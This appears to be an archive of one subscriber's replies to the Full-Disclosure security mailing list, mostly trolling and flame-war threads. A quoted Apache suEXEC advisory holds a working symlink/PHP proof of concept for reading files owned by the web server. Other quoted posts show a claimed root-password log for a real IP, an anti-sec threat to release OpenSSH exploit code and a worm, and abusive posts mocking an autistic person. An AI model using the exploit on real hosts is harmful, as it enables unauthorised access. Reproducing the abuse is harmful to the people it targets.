Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC
Ooh goodie, where and what happened to N3td3v, he used to crack me up :D :D On 3/17/14, Mario Vilas mvi...@gmail.com wrote: ROFL [image: Inline image 1] On Mon, Mar 17, 2014 at 11:07 AM, T Imbrahim timbra...@techemail.comwrote: What drugs are you on Pedro Ribeiro I wonder ...? I express my views, if you don't like don't watch them. You responses so far have only been assy speculations so don't tell me Im wrong , and please don't say thing like that. I don't know who the other people is, but what is true in security I support. Why you would Google my name ... ? Is the English language causing you ill effects? --- ped...@gmail.com wrote: From: Pedro Ribeiro ped...@gmail.com To: timbra...@techemail.com Cc: full-disclosure@lists.grok.org.uk, Michal Zalewski lcam...@coredump.cx, mvi...@gmail.com, gynv...@coldwind.pl Subject: Re: [Full-disclosure] Fwd: Google vulnerabilities with PoC Date: Mon, 17 Mar 2014 09:24:08 + On 16 Mar 2014 23:36, T Imbrahim timbra...@techemail.com wrote: The thread read Google vulnerabilities with PoC. From my understanding it was a RFI vulnerability on YouTube, and I voiced my support that this is a vulnerability. I also explained a JSON Hijacking case as a follow up, and you said you didn't follow. So I am just saying that treating security that way, there are other parties like NSA who welcome them happily. I think these guys - Alfred, Kirschbaum and Imbrahim are the OP's sock puppets. They are all first time posters from unusual free email providers jumping to defend the OP out of nowhere. If you search Google for their emails you only find references to this thread. They present similar (false and /or incorrect) arguments, talk about their extensive work experience, bash Google and its security team and send repeated emails with exactly the same text. This is turning into a madhouse... I hope this guy doesn't have access to a gun. Regards Pedro -- Are you a Techie? Get Your Free Tech Email Address Now! Visit http://www.TechEmail.com -- There's a reason we separate military and the police: one fights the enemy of the state, the other serves and protects the people. When the military becomes both, then the enemies of the state tend to become the people. -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester jgichuki at inbox d0t com {FORUM}http://lists.my.co.ke/pipermail/security/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Google vulnerabilities with PoC
How the hell did you ever think Google will honor this? By now they could be fixing this issue, they hell don't care about you. On 3/15/14, Georgi Guninski gunin...@guninski.com wrote: Is it possible with the help of Godwin's law this discussion moves offlist? -- guninski On Thu, Mar 13, 2014 at 10:43:50AM +, Nicholas Lemonias. wrote: Google vulnerabilities uncovered... http://news.softpedia.com/news/Expert-Finds-File-Upload-Vulnerability-in-YouTube-Google-Denies-It-s-a-Security-Issue-431489.shtml ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester jgichuki at inbox d0t com {FORUM}http://lists.my.co.ke/pipermail/security/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Apache suEXEC privilege elevation / information disclosure
One thing u gotta remember most of the Admins who handle webservers in a network are also developers since most of the organizations will always need to cut on expenses, and as we know, most of the developers will just look into finishing work and making it work. So if something doesn't run due to httpd.conf, you will find these guys loosening server security, therefore opening holes to the infrastructure. Just my two cents ./Chucks On 8/10/13, Kingcope isowarez.isowarez.isowa...@googlemail.com wrote: Uhh Hit em with a little Ghetto Gospel So am i less holy Because i Puff a blunt and Drink a Beer with my homies? Theres no Need for you to fear me if you Take your Time and Hear me Maybe you can learn to cheer me. It aint about Black and white cause we Human !!! Lord can you Hear me speaaak!! http://rapgenius.com/2pac-ghetto-gospel-lyrics Am 09.08.2013 um 16:33 schrieb Kingcope isowarez.isowarez.isowa...@googlemail.com: So the blackhat that Sits on ur Site and the site of ur company Since half a year will stop at the point Where its technically incorrect and wont escalate to root because it doesnt have to do Anything with suexec. Its an Old vuln so let it stay , better for us and soon our Data on your boxes. Time to Write a Real Root exploit and dont waste the Time with sysadmins that know how to set a flag in httpd.conf , apache devs included. Am 09.08.2013 um 14:29 schrieb Kingcope isowarez.isowarez.isowa...@googlemail.com: So what your Emails Tell me is better ignore this vulnerability. I dont Claim its a High severity Bug but if you Tell People to ignore it Because it isnt a vulnerability you are very much aiding the Chaos of insecurity in the Internet today. You Maybe have a Secure Setting but theres only you on the Planet. Attackers Look specifically for such Bugs to Open Servers. No Wonder we have compromises in a High Scale every Day due to this ignorance. My rant on that One. Am 07.08.2013 um 21:49 schrieb king cope isowarez.isowarez.isowa...@googlemail.com: Apache suEXEC privilege elevation / information disclosure Discovered by Kingcope/Aug 2013 The suEXEC feature provides Apache users the ability to run CGI and SSI programs under user IDs different from the user ID of the calling web server. Normally, when a CGI or SSI program executes, it runs as the same user who is running the web server. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI or SSI programs. With this bug an attacker who is able to run php or cgi code inside a web hosting environment and the environment is configured to use suEXEC as a protection mechanism, he/she is able to read any file and directory on the file- system of the UNIX/Linux system with the user and group id of the apache web server. Normally php and cgi scripts are not allowed to read files with the apache user- id inside a suEXEC configured environment. Take for example this apache owned file and the php script that follows. $ ls -la /etc/testapache -rw--- 1 www-data www-data 36 Aug 7 16:28 /etc/testapache only user www-data should be able to read this file. $ cat test.php ?php system(id; cat /etc/testapache); ? When calling the php file using a webbrowser it will show... uid=1002(example) gid=1002(example) groups=1002(example) because the php script is run trough suEXEC. The script will not output the file requested because of a permissions error. Now if we create a .htaccess file with the content... Options Indexes FollowSymLinks and a php script with the content... ?php system(ln -sf / test99.php); symlink(/, test99.php); // try builtin function in case when //system() is blocked ? in the same folder ..we can access the root filesystem with the apache uid,gid by requesting test99.php. The above php script will simply create a symbolic link to '/'. A request to test99.php/etc/testapache done with a web browser shows.. voila! read with the apache uid/gid The reason we can now read out any files and traverse directories owned by the apache user is because apache httpd displays symlinks and directory listings without querying suEXEC. It is not possible to write to files in this case. Version notes. Assumed is that all Apache versions are affected by this bug. apache2 -V Server version: Apache/2.2.22 (Debian) Server built: Mar 4 2013 21:32:32 Server's Module Magic Number: 20051115:30 Server loaded: APR 1.4.6, APR-Util 1.4.1 Compiled using: APR 1.4.6, APR-Util 1.4.1 Architecture: 32-bit Server MPM: Worker threaded: yes (fixed thread count) forked: yes (variable process count) Server compiled with -D APACHE_MPM_DIR=server/mpm/worker -D APR_HAS_SENDFILE -D APR_HAS_MMAP -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled) -D APR_USE_SYSVSEM_SERIALIZE -D
Re: [Full-disclosure] Botnet using Plesk vulnerability and takedown
What happened to the link. On 6/8/13, kai k...@rhynn.net wrote: wget http://botslayer.ru/final_solution.txt i've registered this domain just to save incompetent shitheads who blindly run any code which is supposed to fix security problem. why have you included the non-existent domain in your code? thanks for your interesting investigation anyway. Cheers, Kai ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester jgichuki at inbox d0t com {FORUM}http://lists.my.co.ke/pipermail/security/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] LulzSec EXPOSED!
I think its just a bruteforce. On 6/6/11, Andreas Bogk andr...@andreas.org wrote: Excerpts from lulzfail's message of Mo Jun 06 08:39:42 +0200 2011: Lulzsec == pwnt I've seen the log you pasted to pastebin. Is this: * A timing attack on ssh passwords over the net? * Fake, to distract us from your real 0day? Andreas Log: root@gibson:~# ./1337hax0r 204.188.219.88 -root Attempting too hax0r root password on 204.188.219.88 h,VhXzavMm 3xLl1-_\wC ffsakTgyc~H ZZrz,pJrgB b{4Bv_Y$$Z6 XDh;vDU-;3 FB-hvg%g_'t }qHNvkS'g RNBKvUi5yO| z`(}v1^u *V4?vh9#^f2 /R*9vfhZ# 9P65vjKhh.N \rfsv~PhNDz Bfpv|uhGpy J%kvf]hGf0 sY0v{2hf7p 9dev%Qh6_v *Tbv7?h.** }:lkvV^hN2U ;5Xv'Sh#}_ MOqpvi_hg+# Md9/viVhu7 M(%rvomhb' MI5v_shEVe M=@?vl.hZge MPk5v:WhUTe M=3vvrzh7Te M'?v]sh`Te M/Z,vI1h`Te M.9vO$hTTe Ms!(vY;hpTe MA)SvYLhnTe M7eCv@Lh0Te MkeCvFLh$Te M'eCv?LhaTe MeCvLLh|Te M*eCv5Lh\Te MmeCvcLhCTe MTeCvLhrTe M,eCv1LhYTe MEeCv}LhHTe M_eCvSLhnTe MPeCvSLh+Te M[eCvSLh,Te MOeCvSLhTe M7eCvSLhTe MGeCvSLhdTe M$eCvSLhkTe MCeCvSLhkTe MLeCvSLhkTe M=eCvSLhkTe M-eCvSLhkTe MweCvSLhkTe M=eCvSLhkTe M3eCvSLhkTe M6eCvSLhkTe MreCvSLhkTe M6eCvSLhkTe MFeCvSLhkTe MSeCvSLhkTe M8eCvSLhkTe Password hax0rd! root password: M8eCvSLhkTe root@gibson:~# ssh 204.188.219.88 root@204.188.219.88's password: root@xyz:~# hostname; id; w xyz uid=0(root) gid=0(root) groups=0(root) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester jgichuki at inbox d0t com {FORUM}http://lists.my.co.ke/pipermail/security/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] 10 OpenBSD facts and is timeline of Backdoor
God, i cant even understand half the shit he is saying? English so upside down! On 12/17/10, Christian Sciberras uuf6...@gmail.com wrote: HAHAHAHAHAH!! GOD so are funny you!11 2010/12/16 musnt live musntl...@gmail.com OpenBSD is Backdoor facts 1) Is we look to monkey.org posting, we is see Theo make is change to CVS for this portion of code is work on by Jason (name is mentioned by Perry) 2) Is we look at timeframe for Backdoor, is code be in 2.5 or 2.6, musn't live theorize 2.6 * 2.6: December 1, 1999 - * Based on the original SSH suite and developed further by the OpenBSD team, 2.6 saw the first release of OpenSSH, which is now available standard on most Unix-like operating systems and is the most widely used SSH suite. http://en.wikipedia.org/wiki/Timeline_of_OpenBSD 3) Is Theo not deny there is no backdoor, only say he is unaware (musn't live is unaware of exact time right now, is know time exist!) a) Theo and OpenBSD not audit anything (trusting trust) b) pre-emptive is wasn't me from Theo in event truth comes later Hey I is Theo I do right thing and strike err.. Disclose first! I not know! c) all of is the above 4) While is everyone claim Perry прил, is no one else outside of Jason on OpenBSD is say: Perry is lying even former developers is stay quiet to protect the DARPA/FBI innocent 5) Is possible at people by mentioned in named by Perry, go to Canada to hack code and plant is backdoor 6) Old code (2.6) is sayanoruski. Is good luck find mirror. CVS is controlled by those is accused, quick move and we is have: See is no backdoor in this backdoor! 7) OpenBSD is the most secure backdoored on the planet 8) Is need slogan change: Only two remote holes in the default install, in a heck of a long time! (Is besides backdoor!!!) 9) We is all peons to Theo and we is cannot figure out truth as we is brains are so too small 10) Claims surpass is Microsoft NSA theory ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Unbanning Andrew Wallace to protect global information intelligence
waoh. very funny. On 3/21/10, Andrew Walberg andrew.walb...@rocketmail.com wrote: Hello. Everyone here has learned there lesson and has suffered because Andrew Wallace (n3td3v) has been banned. n3td3v is a multi-national organization of national security experts who have been driven to the underground thanks to John Cartwright. Since then, mossad has been able to infiltrate and cause significant global problems. n3td3v was offended and furious. He doesn't have 0day. He doesn't hack. Unban Andrew Wallace and let the information be free. If you unban him we will finally have justice in this world for n3td3v and his 5000 employees. Everyone at our office is waiting for your answer, John Cartwright __ Do You Yahoo!? Sie sind Spam leid? Yahoo! Mail verfügt über einen herausragenden Schutz gegen Massenmails. http://mail.yahoo.com -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
Especially the ones working for governments, the surveillance and espionage etc, scares more On 1/4/10, netinfinity netinfinity.security...@gmail.com wrote: I couldn't agree more with Adriel. -- netinfinity ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Antisec for lulz - exposed (anti-sec.com)
One of the amazing thing about these hackers calling them antisec didn't have real hardening on their servers. Most of their servers had direct public ip on their Interfaces and even their user management was crappy. I remember when i heard of antisec i thot these guys were real gurus with more than 10 years of experience, but after the fake sshd and fake attacks, and DDOS that meant nothing and now all is lulz, i cant help but rofl. ./Chuks On 1/2/10, Jeff Blaum jblau...@gmail.com wrote: It still does not change the fact that you (Glafkos) are a cock, and that astalavista is (and was) always a shit stain of a website. J On Thu, Dec 31, 2009 at 9:38 AM, Glafkos Charalambous i...@infosec.org.ukwrote: . | \ * ./ . * * * . -=* LULZ! *=- . .* * * . /* .\ | . _ _ ( ) ( ) | |_| | _ _ _ __ __ _ | _ | /'_` )( '_`\ ( '_`\ ( ) ( ) | | | |( (_| || (_) )| (_) )| (_) | (_) (_)`\__,_)| ,__/'| ,__/'`\__, | | || |( )_| | (_)(_)`\___/' _ _ _ _ ( ) ( )( ) ( ) | `\| | __ _ _ _ `\`\_/'/'__ _ _ _ __ | , ` | /'__`\( ) ( ) ( )`\ /'/'__`\ /'_` )( '__) | |`\ |( ___/| \_/ \_/ | | |( ___/( (_| || | (_) (_)`\)`\___x___/' (_)`\)`\__,_)(_) anti-sec.com . | \ * ./ . * * * . -=* RAWR! *=- . .* * * . /* .\ | . http://www.anti-sec.com http://pastebin.com/f12f6f9c0 http://pastebin.mozilla.org/694145 http://pastebin.ca/1733192 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] The Cyber War Conspiracy
K, full-disclos...@safe-mail.net or whoever you are, i think you are watching too much of 24 or even Spooks. Please quit and relax abit!!! ./Chuks On 12/5/09, Paul Schmehl pschmehl_li...@tx.rr.com wrote: --On December 4, 2009 10:44:20 PM -0600 valdis.kletni...@vt.edu wrote: On Fri, 04 Dec 2009 14:32:34 PST, Sam Haldorf said: n3td3v is probably ureleet, full-censorship, full-disclosure, antisec, jdl and valdis. He might be those other dudes, but he's not me. If I was going to pose as a troll, I'd pose as a more clueful troll - trying to think that cluelessly makes my brain hurt. On the other hand, nobody's ever seen me and Paul Schmehl at the same place at the same time... I wonder why... :) Because we have no travel money. :-) Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ** WARNING: Check the headers before replying ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v mentioned in a book?
Maybe its not a Ban, maybe its a burn notice! On 10/4/09, full-censors...@hushmail.com full-censors...@hushmail.com wrote: if this guy is mentioned in a book and we banned him? http://f0rb1dd3n.com/links.php i'm calling for a serious review of whats going on with the ban list. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers
Thank you for this my.hndl. There are some issues i have been having and seems your methodology may work on Fedora and others OSs. Thankx ./Chuks On 9/30/09, maxigas maxi...@anargeek.net wrote: From: bo...@civ.zcu.cz bo...@civ.zcu.cz Subject: Re: [Full-disclosure] Modifying SSH to Capture Login Credentials from Attackers Date: Wed, 30 Sep 2009 00:03:51 +0200 All standard users have read access to /var/log/auth, so if root they shouldn't, at least on my default debian they don't ... On my default Ubuntu, users in adm group have reac access to the authentication log file: m...@machine: ls -l /var/log/auth.log -rw-r- 1 syslog adm 46774 2009-09-30 01:10 /var/log/auth.log -- ×× maxigas // villanypásztor / kiberpunk / web shepherd // -= Important communication disclaimer: by replying to my emails you are disclaiming all your disclaimers. =- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v's Twitter account hacked
Just saw that. Thot were new trolls by n3td3v pouring all the way to twitter. On 9/19/09, The Security Community thesecuritycommun...@gmail.com wrote: Someone evidently hacked into n3td3v's Twiiter account and is spewing nonsense. http://twitter.com/n3td3v Maybe it's some sort of botnet CC account now, I dunno. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Moar iProphet questions
Now, i think this is really wrong. There is no need of making fun of someone who is disabled by attacking n3td3v. On 8/29/09, Gary McKinnon john.wall...@hush.com wrote: iProphet (weev) Questions Sorry for being repetitive. FD is mostly hoarsechit and fucin around anyway (not that you do ANY of that). My name is Gary McKinnon, I'm the nerd that hacked into the Pentagon. I'm autistic so I may have difficulty communicating or understanding you. HELLO? Can you hear me? I CAN'T SEE THE SCREEN. LET ME TRY TO TYPE SOME QUEStions 8==^H^H^H^H^HD 1.) Do you have HIV? 2.) Have you ever anointed anyone with your IRL Virus? 3.) Do you think that you could be prosecuted for hacking if you give people your IRL badware? 4.) Do the woman you give HIV to go to heaven? 5.) What does your computer screen look like? You run linux? Do you have an iProphet wallpaper? 6.) When will we be seeing new vlogcasts 7.) Do you plan on writing some subversive PDF's for us? 8.) Do you intend on making a documentary so it can go viral and cause a revolution? 9.) In your mind, what is your picture of an ideal world? This post was by Gary McKinnon [SOLO], elite autistic hacker. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] http://secreview.blogspot.com -- end of life
Please bring it back. It was a nice blog, or send me an archive of the ut. Thankx ./Chuks On 8/13/09, secrev...@hushmail.me secrev...@hushmail.me wrote: Hi Everyone, We received a lot of emails from different people asking us what happened to our blog at http://secreview.blogspot.com. What happened is we decided to shut down operations because we don't have time to keep doing reviews. We also don't have time to redo reviews which is needed to keep the reviews fair. We all have full time jobs and recently have been traveling a lot. We started secreview because we wanted to expose security companies for what they really were. But now because we can't do it any more we don't think its fair that only some companies get reviewed and others don't. So we deleted the blog (but we have 90 days to bring it back if people want it). If we do bring it back, we will probably not do any more reviews and we will leave it up just because. Do people want the blog to be recovered or do they want us to keep it dead? -- Secreview ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] [Professional IT Security Providers - Exposed] Redspin, Inc. (C+)
Just read this. What happened to your blog, http://secreview.blogspot.com? On 8/11/09, secreview secrev...@hushmail.com wrote: We received 22 requests from different people to perform a review of Redspin! Their website can be found at http://www.redspin.com. We haven’t done a review of anyone in quite a while, the last review that we did was for Pivot Point Security who got an A (we still recommend them). We apologize for this long delay but we have been very busy traveling (yes we still have jobs doing consulting work sometimes). As you can see from the comments that we received in other posts we have a lot of catch up work to do, but to be honest we are not sure that we will be able to do it. This review might be our final and last review depending on how much more travel we have. (We have lives, some of us have families, and we can’t keep doing this for free even though we feel that this is a great service). We did a lot of research on Redspin and we managed to get a copy of two reports that they did for two different customers. We won’t share those reports with you because that would be unethical, don’t ask. Redspin claims that it is a “pure penetration testing firm”. What they mean by “pure penetration testing” is that they do not resell third party software or hardware. They also say that “don't find problems on your network so that [they] can make more money; [their] penetration testing services reveal vulnerabilities, [that] will help you become more secure.” We verified their claim with our own research. Redspin will not try to sell you software or hardware… but they might try to sell you software as a service. (see their www.jetmetric.com website). Redspin takes it a step further and is brutally honest about their methodology for delivering penetration-testing services. They openly admit that their services rely on automated vulnerability scanners (Nessus) and are enhanced by manual testing. In fact, Redspin says that automated scanners “can miss about 40% of the security risk so they alone do not adequately assess risk. Furthermore, about half of the findings from a vulnerability scan are false positives”. Any security company that relies on automated scanners can weed out false positives, but doing that doesn’t really increase the depth and accuracy of testing. A false positive, also known as an error of the first kind, or a Type I Error, is the rejection of a null hypothesis when it is in fact true. In more simple terms, this is the error of observing a difference when in fact there isn’t one. Identifying false positives is fairly easily done, as it only requires inspecting the results produced by a scanner. But what about False Negatives? A False Negative, also called a Type II Error, or an error of the second kind, is the error of failing to reject a null hypothesis when it is in fact not true. More simply, a False Negative is the error of failing to observe a difference when in truth there is one. So, if an automated vulnerability scanner tests a vulnerable service (a known vulnerability) but the scanner doesn’t detect the vulnerability then the vulnerability is excluded from the report. If this is the case then Redspin’s methodology will break down because there will be no result in the report for Redspin to manually test. That vulnerability will fly under the Redspin radar but might not be missed by a hacker. So how many vulnerabilities does Redspin miss? It’s a question worth asking. Redspin does say that “vulnerability scanning is not suitable on its own as a complete or billable service offering, it does provides some value in the early reconnaissance phase of a more comprehensive External Network Security Assessment”. They have a typo in that sentence, but other than that, they are right. Vulnerability scanning does have a position in the industry and is a huge time saver, especially when testing large numbers of systems. Just don’t rely on one vulnerability scanner like Redspin does, use two or more like the OSSTMM proposes. Redspin says “manual analysis is at the heart of all of [their] assessments which not only gives you confidence that you have a complete view of your security risk, but provides tailored reporting and recommendations enabling simple work-arounds and cost-effective mitigation strategies for most security issues.” Based on our research Redspin’s “manual analysis” isn’t what we expected it to be. It is not based on vulnerability research and is strictly based on the inspection and verification of scanner output. What we can say is that their “manual analysis” doesn’t produce the highest quality reports that ever we’ve seen, but it does produce reports that are higher than average quality. The Redspin reports have very few, if any, False Positives but will contain more False Negatives than a report that is centered on solid (vulnerability) research. One thing that Redspin does
Re: [Full-disclosure] AntiSec PHHEER #1 (anti...@hushmail.com)
i thought the same thing. This guy shud get a life!!! On 8/9/09, Zloss aza...@gmail.com wrote: So what the heck are you doing dumbass ? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] anti-sec: OpenSSH = 5.2 zero day exploit code - 48 hours until it is publicly released!
hahaha, now u r releasing it I thought u guyz dont release or disclose vulnerabilities. ./Chuks On 7/20/09, Ant-Sec Movement anti.sec.movem...@gmail.com wrote: Dear Reader, In 48 hours, the anti-sec movement will publicly unveil working exploit code and full details for the zero-day OpenSSH vulnerability we discovered. It will be posted to the Full-Disclosure security list. Soon, the very foundations of Information Technology and Information Security will be unearthed as millions upon million of systems running ANY version of OpenSSH are compromised by wave after wave of script-kiddie and malicious hacker. Within 10 hours of the initial release of the OpenSSH 0-day exploit code, anti-sec will be unleashing powerful computer worm source code with the ability to auotmatically find and compromise systems running any and all versions of OpenSSH. This is an attack against all White Hat Hackers who think that running a Penetration Test simply searching for known vulnerabilities is all they have to do in order to receive their payment. Anti-sec will savor the moment when White Hat Hackers are made to look like fools in the eyes of their clients. Sincerely, -anti-sec -- -- Gichuki John Ndirangu, I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] n3td3v is posting as ant-sec
Hehehe, netdev? For real?. He is the Anti-sec. I think thats wrong On Thu, Jul 16, 2009 at 1:35 PM, Benjamin Cancecance.consult...@gmail.com wrote: now we know who antisec are/is, i'm going to bed Charles Majola wrote: HAH! I knew it On Thu, Jul 16, 2009 at 2:54 PM, Ureleeturel...@gmail.com wrote: careful. n3td3v has found his way back onto the list. he is now posting as ant-sec. he is hacking and spreading disinformation on full-d. careful who you talk 2, he has many names. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- -- Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P I.T Security Analyst and Penetration Tester infosig...@inbox.com {FORUM}http://lists.my.co.ke/pipermail/security/ http://nspkenya.blogspot.com/ http://chuksjonia.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/